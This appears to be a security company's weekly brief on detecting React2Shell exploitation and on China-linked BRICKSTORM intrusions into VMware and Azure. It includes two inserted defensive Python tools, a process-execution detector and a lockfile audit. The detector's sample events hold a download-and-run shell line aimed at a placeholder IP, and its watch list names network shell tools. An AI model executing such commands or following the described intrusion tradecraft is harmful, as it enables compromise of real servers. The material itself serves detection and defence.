
Netizen: Monday Security Brief (12/8/2025)

Today’s Topics:

  • Detecting React2Shell: What Security Teams Should Be Watching for Right Now
  • BRICKSTORM: How PRC Operators Are Turning VMware and Cloud Infrastructure into Long-Term Access Platforms
  • How can Netizen help?

Detecting React2Shell: What Security Teams Should Be Watching for Right Now

Since the disclosure of CVE-2025-55182 on December 3, 2025, most of the attention around React2Shell has centered on patching timelines and framework exposure. That is necessary, but for many environments, detection is the real safety net while fixes are staged, tested, and deployed. This vulnerability enables unauthenticated remote code execution against React Server Components through a single crafted HTTP request, and public proof-of-concept code is already circulating. With default configurations proving exploitable in most cases, security teams should assume active scanning and live exploitation attempts are already taking place.

The core behavior to watch for is unexpected server-side command execution originating from Next.js, React Router, or other RSC-backed runtimes. Once the deserialization flaw in the React “Flight” protocol is triggered, attackers can instruct the server to spawn shell commands directly. In practice, this often surfaces as web-facing services suddenly executing file system commands, downloading secondary payloads, or opening outbound connections that do not align with normal application behavior. Any instance of a web server process invoking utilities like ls, cat, curl, wget, chmod, or similar tools in production should be treated as a high-confidence signal.

Runtime detection has already proven effective against this activity. The Sysdig Threat Research Team reinforced its “Suspicious Command Executed by Web Server” logic to catch React2Shell exploitation as it happens. Their Falco rule focuses on process execution events where a shell is launched by next-server, react-router, waku, or vite-related processes and then used to execute common Unix commands. In observed cases, this rule alone has been sufficient to surface exploitation almost immediately. Additional runtime alerts such as reverse shell detections and UNIX socket redirections have also been triggered during real attack simulations, which aligns with attacker behavior focused on persistence and remote control.
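The signal described in the two paragraphs above (a shell or Unix utility spawned beneath an RSC runtime process) can be checked offline against exported process-execution telemetry. The block below is an added example for this brief, not Sysdig's Falco rule and not code from the original page: it expresses the same parent-process logic in Python, parses the `sh -c` payload to list the utilities actually invoked, and runs over a few constructed events. The event field names (`pid`, `exe`, `argv`, `ancestors`) and the sample events are assumptions for the example; map them to whatever your EDR or Falco output actually emits.

```python
"""Runtime detection for React2Shell-style post-exploitation.

Added example (not from the original brief, not Sysdig's Falco rule):
a shell or Unix utility executed with an RSC runtime process in its
ancestry is reported, together with the commands found inside any
`sh -c` payload. Field names and sample events are constructed.
"""
from __future__ import annotations

import json
import re
import shlex
from dataclasses import asdict, dataclass
from typing import Optional

# Parent process names the brief says the Falco rule watches. Bare "node"
# is deliberately absent: add it only if your Next.js instance does not
# set the "next-server" process title, and expect to tune for noise.
RSC_RUNTIMES = {"next-server", "react-router", "waku", "vite", "vite-node"}
SHELLS = {"sh", "bash", "dash", "ash", "zsh"}
# Utilities an RSC runtime has no business executing in production.
SUSPICIOUS_UTILS = {
    "ls", "cat", "curl", "wget", "chmod", "id", "whoami", "uname",
    "nc", "ncat", "socat", "python", "python3", "perl", "base64",
}
# Shell control operators that separate simple commands in a `sh -c` string.
_SPLIT_RE = re.compile(r"\|\||&&|[;|&\n]")
_ASSIGNMENT_RE = re.compile(r"^[A-Za-z_]\w*=")


@dataclass(frozen=True)
class Finding:
    pid: int
    parent_runtime: str
    commands: tuple      # utility basenames observed, in order
    cmdline: str


def _base(name: str) -> str:
    return name.rsplit("/", 1)[-1]


def commands_in_shell_string(script: str) -> list[str]:
    """Basename of the first word of each simple command in a `sh -c`
    payload: 'id; curl http://x | sh' -> ['id', 'curl', 'sh']."""
    out = []
    for segment in _SPLIT_RE.split(script):
        try:
            words = shlex.split(segment)
        except ValueError:             # unbalanced quotes: fall back to whitespace
            words = segment.split()
        while words and _ASSIGNMENT_RE.match(words[0]):   # skip VAR=value prefixes
            words.pop(0)
        if words:
            out.append(_base(words[0]))
    return out


def evaluate(event: dict) -> Optional[Finding]:
    """event: {"pid", "exe", "argv", "ancestors"}; ancestors is nearest parent first."""
    runtime = next((_base(a) for a in event["ancestors"] if _base(a) in RSC_RUNTIMES), None)
    if runtime is None:
        return None                    # not under an RSC runtime: out of scope here
    exe, argv = _base(event["exe"]), event["argv"]
    if exe in SHELLS:
        # Any shell under the runtime is reported; the parsed commands from
        # `-c` are attached so triage can see what it was used for.
        cmds: list[str] = []
        if "-c" in argv and argv.index("-c") + 1 < len(argv):
            cmds = commands_in_shell_string(argv[argv.index("-c") + 1])
        seen = tuple(c for c in cmds if c in SUSPICIOUS_UTILS or c in SHELLS)
        return Finding(event["pid"], runtime, seen or (exe,), shlex.join(argv))
    if exe in SUSPICIOUS_UTILS:
        return Finding(event["pid"], runtime, (exe,), shlex.join(argv))
    return None


def scan(events) -> list[Finding]:
    return [f for f in (evaluate(e) for e in events) if f is not None]


# Constructed sample telemetry for this example (not real captures).
SAMPLE_EVENTS = [
    {"pid": 4101, "exe": "/bin/sh",
     "argv": ["sh", "-c", "id; curl -s http://203.0.113.5/x.sh | sh"],
     "ancestors": ["next-server", "containerd-shim"]},
    {"pid": 4102, "exe": "/usr/bin/node", "argv": ["node", "worker.js"],
     "ancestors": ["next-server"]},                       # benign child worker
    {"pid": 4103, "exe": "/bin/sh", "argv": ["sh", "-c", "ls /var/www"],
     "ancestors": ["nginx", "systemd"]},                  # no RSC runtime above it
    {"pid": 4104, "exe": "/usr/bin/curl", "argv": ["curl", "http://203.0.113.5/p"],
     "ancestors": ["react-router", "node"]},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(json.dumps(asdict(finding)))
```

Run against the constructed events it reports pids 4101 and 4104 only: the shell under next-server (with `id`, `curl`, `sh` extracted from the `-c` string) and the direct `curl` under react-router. The nginx-spawned shell is ignored on purpose, since this example scopes itself to RSC runtimes; your broader web-server rule should still cover it.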

Network-layer protections also play a role, though they should be treated strictly as short-term containment. Cloudflare, Google Cloud Armor, Vercel, and Firebase have all deployed platform-level rules aimed at blocking exploitation attempts tied to unsafe deserialization in POST requests. These controls can reduce opportunistic attacks, but they do not change the underlying application behavior. WAF bypass techniques remain a routine part of modern exploit chains, so organizations relying solely on edge filtering remain exposed.

Vulnerability scanning adds another detection layer, though teams should be cautious about tool quality. Many publicly shared scanners misidentify React2Shell or fail to confirm exploitability accurately. Assetnote released one of the more reliable approaches by triggering a specific server error response tied to the vulnerable deserialization logic. Platforms with integrated vulnerability management can already flag affected React packages directly through software inventory, which helps prioritize response across large environments.

From a defensive standpoint, the detection priority is straightforward: watch for anomalous command execution by web services, monitor outbound connections from application servers that do not normally initiate external traffic, and treat any reverse shell indicators as confirmation of compromise. These signals tend to appear quickly after successful exploitation because attackers gain immediate code execution and typically move to payload delivery or persistence within seconds.

Patching remains the only real fix, but detection is what buys response teams time. Updated React Server Components releases at 19.0.1, 19.1.2, and 19.2.1 (one per affected 19.x minor line) remove the vulnerable code path, and patched Next.js versions close downstream exposure. Until those updates are fully deployed, continuous runtime monitoring is the line that separates a blocked exploit attempt from a full server takeover.
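The inventory-based check mentioned in the scanning paragraph and the fixed versions listed just above combine into a simple lockfile audit. The block below is an added example for this brief, not a vendor tool and not code from the original page. It walks a `package-lock.json` (lockfileVersion 2 or 3 `packages` map, including nested `node_modules` copies) and classifies each React Server Components package against the fixed release for its minor line. The package names are assumed from the React advisory for CVE-2025-55182 (`react-server-dom-webpack`, `react-server-dom-parcel`, `react-server-dom-turbopack`); the sample lockfile is constructed.

```python
"""Flag React Server Components packages that predate the React2Shell fix.

Added example, not from the original brief and not a vendor scanner.
Version logic follows the fixed releases named in the brief; package
names are assumed from the React advisory. Sample lockfile is constructed.
"""
from __future__ import annotations

import json
import re
import sys
from typing import Iterator

# Fixed release per affected minor line (from the brief). Anything older on
# the same line is vulnerable; lines before 19.0 have no stable RSC packages.
FIXED_BY_LINE = {(19, 0): (19, 0, 1), (19, 1): (19, 1, 2), (19, 2): (19, 2, 1)}
# Assumed from the React advisory; extend to match your inventory.
RSC_PACKAGES = {
    "react-server-dom-webpack",
    "react-server-dom-parcel",
    "react-server-dom-turbopack",
}
_VER = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-(.+))?$")


def classify(version: str) -> str:
    """Return 'vulnerable', 'fixed', 'not-affected', 'review' or 'unknown'."""
    m = _VER.match(version)
    if not m:
        return "unknown"
    major, minor, patch = (int(m.group(i)) for i in (1, 2, 3))
    prerelease = m.group(4)
    fixed = FIXED_BY_LINE.get((major, minor))
    if fixed is None:
        # 18.x and earlier: no affected package exists. Newer lines than the
        # advisory names: do not guess, send it to the advisory.
        return "not-affected" if (major, minor) < (19, 0) else "unknown"
    if prerelease:
        return "review"   # canary/experimental builds: patch number is not comparable
    return "vulnerable" if (major, minor, patch) < fixed else "fixed"


def lockfile_packages(lock: dict) -> Iterator[tuple[str, str, str]]:
    """Yield (install_path, package_name, version) for each `packages` entry,
    including nested copies such as node_modules/next/node_modules/<pkg>."""
    for path, meta in lock.get("packages", {}).items():
        if not path:                 # "" is the root project itself
            continue
        name = path.rsplit("node_modules/", 1)[-1]   # keeps @scope/name intact
        yield path, name, meta.get("version", "")


def audit(lock: dict) -> list[dict]:
    """One record per RSC package found, in lockfile order."""
    return [
        {"path": path, "package": name, "version": version, "status": classify(version)}
        for path, name, version in lockfile_packages(lock)
        if name in RSC_PACKAGES
    ]


# Constructed sample lockfile (not from a real project).
SAMPLE_LOCK = {
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo-app"},
        "node_modules/react": {"version": "19.1.0"},
        "node_modules/react-server-dom-webpack": {"version": "19.1.0"},
        "node_modules/next/node_modules/react-server-dom-turbopack": {"version": "19.2.1"},
        "node_modules/@acme/ui/node_modules/react-server-dom-parcel": {"version": "19.2.0-canary-abc123"},
    },
}

if __name__ == "__main__":
    lock = json.load(open(sys.argv[1])) if len(sys.argv) > 1 else SAMPLE_LOCK
    for record in audit(lock):
        print(json.dumps(record))
```

Invoked as `python audit_rsc.py package-lock.json` it prints one JSON line per RSC package; on the constructed lockfile the three entries come back as vulnerable, fixed and review respectively, and `react` itself is ignored because the fix lives in the `react-server-dom-*` packages. Treat "review" and "unknown" as work items, not as clean results.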


BRICKSTORM: How PRC Operators Are Turning VMware and Cloud Infrastructure into Long-Term Access Platforms

CISA confirmed last week that a sophisticated backdoor called BRICKSTORM is being actively used by state-sponsored operators from the People’s Republic of China to maintain long-term, covert access inside U.S. networks. The malware targets both VMware vSphere and Windows environments and is designed for persistence, remote command execution, and stealthy command-and-control. According to CISA, BRICKSTORM gives attackers interactive shell access along with full file manipulation capabilities, making it a powerful post-exploitation platform rather than a simple loader or beacon.

BRICKSTORM is written in Golang and supports multiple C2 channels, including HTTPS, WebSockets, nested TLS, and DNS-over-HTTPS. It can also operate as a SOCKS proxy, which allows attackers to tunnel traffic through compromised systems and pivot deeper into internal networks. One of its more dangerous traits is its built-in self-monitoring logic that automatically reinstalls or restarts the implant if it is disrupted. That single feature sharply increases dwell time by allowing the malware to survive partial remediation efforts.

The malware was first documented in 2024 by Google Mandiant during investigations tied to the zero-day exploitation of Ivanti Connect Secure vulnerabilities, including CVE-2023-46805 and CVE-2024-21887. Since then, the activity has matured. CISA now ties the tool to operations conducted by UNC5221 and a separate China-nexus threat cluster that CrowdStrike tracks as Warp Panda. CrowdStrike reports that Warp Panda has been active since at least 2022 and has focused heavily on VMware vCenter environments inside U.S. legal, technology, and manufacturing organizations throughout 2025.

In one confirmed intrusion, attackers gained initial access to a public-facing web server inside a DMZ using a web shell, then moved laterally into an internal vCenter server where BRICKSTORM was implanted after privilege escalation. From there, the operators harvested service account credentials, accessed a domain controller over RDP, and extracted Active Directory data. They continued moving laterally using SMB to additional jump servers and an ADFS server, where cryptographic keys were exfiltrated. From the compromised vCenter system, they were then able to relay traffic between hypervisors and guest VMs while disguising BRICKSTORM as a legitimate vCenter process.

CISA’s technical breakdown shows that BRICKSTORM relies on custom handlers to spin up web servers on compromised hosts, establish SOCKS proxy tunnels, and execute commands remotely. Some components are purpose-built for virtualized environments and leverage the VSOCK interface for inter-VM communication, data exfiltration, and resilience across ESXi hosts and guest machines. CrowdStrike confirmed that in several intrusions, BRICKSTORM was deployed alongside two previously undocumented Golang implants named Junction and GuestConduit. Junction acts as a local HTTP command server and proxy layer on ESXi hosts, while GuestConduit sits inside guest VMs and maintains a persistent VSOCK listener on port 5555 to bridge traffic back to the hypervisor.

Initial access continues to rely on edge device exploitation and stolen or abused credentials. Confirmed vulnerabilities include multiple Ivanti Connect Secure flaws, VMware vCenter bugs such as CVE-2024-38812, CVE-2023-34048, and CVE-2021-22005, as well as CVE-2023-46747 in F5 BIG-IP. Once inside vCenter, the attackers use SSH, the privileged “vpxuser” account, and SFTP to move laterally and shuttle data between hosts. Their cleanup discipline remains strong, with timestomping, aggressive log clearing, and short-lived rogue virtual machines used for staging operations before being destroyed.

What makes Warp Panda’s activity especially concerning is its cloud focus. CrowdStrike described the group as “cloud-conscious,” noting repeated abuse of Microsoft Azure environments after on-prem compromise. Attackers accessed OneDrive, SharePoint, and Exchange by stealing browser session tokens and replaying them through BRICKSTORM tunnels. In at least one case, they registered new MFA devices to entrench access and used Microsoft Graph API calls to enumerate service principals, applications, directory roles, and user mailboxes. This shows a clean operational bridge between on-prem virtualization compromise and direct exploitation of SaaS identity planes.

The operational goal is not disruption. Everything about this malware stack points to intelligence collection and quiet, long-term access. CrowdStrike observed attackers cloning domain controller virtual machines inside vCenter to extract Active Directory databases offline. They also accessed employee email accounts aligned with Chinese government interest areas and performed limited reconnaissance against foreign government networks from within U.S. infrastructure. This is classic strategic access behavior backed by modern virtualization tradecraft.


How can Netizen help?

Founded in 2013, Netizen is an award-winning technology firm that develops and leverages cutting-edge solutions to create a more secure, integrated, and automated digital environment for government, defense, and commercial clients worldwide. Our innovative solutions transform complex cybersecurity and technology challenges into strategic advantages by delivering mission-critical capabilities that safeguard and optimize clients’ digital infrastructure. One example of this is our popular “CISO-as-a-Service” offering that enables organizations of any size to access executive level cybersecurity expertise at a fraction of the cost of hiring internally. 

Netizen also operates a state-of-the-art 24x7x365 Security Operations Center (SOC) that delivers comprehensive cybersecurity monitoring solutions for defense, government, and commercial clients. Our service portfolio includes cybersecurity assessments and advisory, hosted SIEM and EDR/XDR solutions, software assurance, penetration testing, cybersecurity engineering, and compliance audit support. We specialize in serving organizations that operate within some of the world’s most highly sensitive and tightly regulated environments where unwavering security, strict compliance, technical excellence, and operational maturity are non-negotiable requirements. Our proven track record in these domains positions us as the premier trusted partner for organizations where technology reliability and security cannot be compromised.

Netizen holds ISO 27001, ISO 9001, ISO 20000-1, and CMMI Level III SVC registrations demonstrating the maturity of our operations. We are a proud Service-Disabled Veteran-Owned Small Business (SDVOSB) certified by U.S. Small Business Administration (SBA) that has been named multiple times to the Inc. 5000 and Vet 100 lists of the most successful and fastest-growing private companies in the nation. Netizen has also been named a national “Best Workplace” by Inc. Magazine, a multiple awardee of the U.S. Department of Labor HIRE Vets Platinum Medallion for veteran hiring and retention, the Lehigh Valley Business of the Year and Veteran-Owned Business of the Year, and the recipient of dozens of other awards and accolades for innovation, community support, working environment, and growth.

Looking for expert guidance to secure, automate, and streamline your IT infrastructure and operations? Start the conversation today.